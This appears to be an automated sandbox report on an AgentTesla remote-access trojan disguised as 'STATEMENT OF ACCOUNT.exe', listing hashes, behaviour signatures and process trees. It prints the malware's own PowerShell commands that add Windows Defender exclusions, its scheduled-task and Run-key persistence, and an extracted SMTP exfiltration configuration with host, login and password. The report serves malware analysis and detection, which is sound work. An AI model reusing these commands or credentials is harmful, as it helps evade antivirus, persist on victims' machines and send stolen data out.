Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
09-06-2024 22:50
Static task
static1
Behavioral task
behavioral1
Sample
STATEMENT OF ACCOUNT.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
STATEMENT OF ACCOUNT.exe
Resource
win10v2004-20240426-en
General
-
Target
STATEMENT OF ACCOUNT.exe
-
Size
693KB
-
MD5
c63d59194d1f0735dacda6ae00f46420
-
SHA1
1132adb51c8f80ce6b453c7d8c4399af579d5175
-
SHA256
ce6cf51607a2fd0b3aa61c066d0adf7d659418c4cd78ef8824a46f89e639867b
-
SHA512
ccae4b5d7bb389872bc162e6c2d00f280b2537db53c2dd1fe7f55142552dc792bba1bfbef21182ba4355e3f2b473447d70e654403b385b55c7496111ac4178b7
-
SSDEEP
12288:hTo2iNStcYl0SNGZSUKnBnn0kk9HSkqHcSxk9qNk2Q4PaUOvYbnjcueIGujE11/h:hTo1McNoGZS5CbHS9Hcz9qN3QIOQbnjO
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.springandsummer.lk - Port:
587 - Username:
[email protected] - Password:
anu##323 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid Process 2716 powershell.exe 2684 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
RegSvcs.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\boqXv = "C:\\Users\\Admin\\AppData\\Roaming\\boqXv\\boqXv.exe" RegSvcs.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
STATEMENT OF ACCOUNT.exedescription pid Process procid_target PID 2456 set thread context of 1028 2456 STATEMENT OF ACCOUNT.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
STATEMENT OF ACCOUNT.exeRegSvcs.exepowershell.exepowershell.exepid Process 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 2456 STATEMENT OF ACCOUNT.exe 1028 RegSvcs.exe 1028 RegSvcs.exe 2684 powershell.exe 2716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
STATEMENT OF ACCOUNT.exeRegSvcs.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2456 STATEMENT OF ACCOUNT.exe Token: SeDebugPrivilege 1028 RegSvcs.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
STATEMENT OF ACCOUNT.exedescription pid Process procid_target PID 2456 wrote to memory of 2716 2456 STATEMENT OF ACCOUNT.exe 28 PID 2456 wrote to memory of 2716 2456 STATEMENT OF ACCOUNT.exe 28 PID 2456 wrote to memory of 2716 2456 STATEMENT OF ACCOUNT.exe 28 PID 2456 wrote to memory of 2716 2456 STATEMENT OF ACCOUNT.exe 28 PID 2456 wrote to memory of 2684 2456 STATEMENT OF ACCOUNT.exe 30 PID 2456 wrote to memory of 2684 2456 STATEMENT OF ACCOUNT.exe 30 PID 2456 wrote to memory of 2684 2456 STATEMENT OF ACCOUNT.exe 30 PID 2456 wrote to memory of 2684 2456 STATEMENT OF ACCOUNT.exe 30 PID 2456 wrote to memory of 1616 2456 STATEMENT OF ACCOUNT.exe 32 PID 2456 wrote to memory of 1616 2456 STATEMENT OF ACCOUNT.exe 32 PID 2456 wrote to memory of 1616 2456 STATEMENT OF ACCOUNT.exe 32 PID 2456 wrote to memory of 1616 2456 STATEMENT OF ACCOUNT.exe 32 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34 PID 2456 wrote to memory of 1028 2456 STATEMENT OF ACCOUNT.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IyoNJg.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IyoNJg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5928.tmp"2⤵
- Creates scheduled task(s)
PID:1616
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e5495e08dcc55693d845b46a075e340a
SHA1ff5e256abdf84986c71d78cf94abcc7b4bfa04ef
SHA2569b50714a4e49026825761d5ca37db015a9548868c888c07b13a4c2ad7a1b5bd9
SHA512db610e452703c8419a71e2839df28e9d58028d981e3a01c94cbdecf4c8744d7d1814b235e7314810706e1c4a13c5849be52020159b81b972a5584cea35617012
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52288cd15699fa32dfeeebc7077759804
SHA17eb2c9104d0e86ddec676318a72d56426422638b
SHA256c76835442cfdc480e93f14863edfc8fd6c0211b2bdd377a99cff121b0b1f1c2a
SHA51242a4564153095e231e08ee5fd270a18a44fc855301b5db30c0438e59ff273845aca2ad62d6955c0d46ce3d00afe47f637b0556e06f78ae46b32fd8f1a4ccef85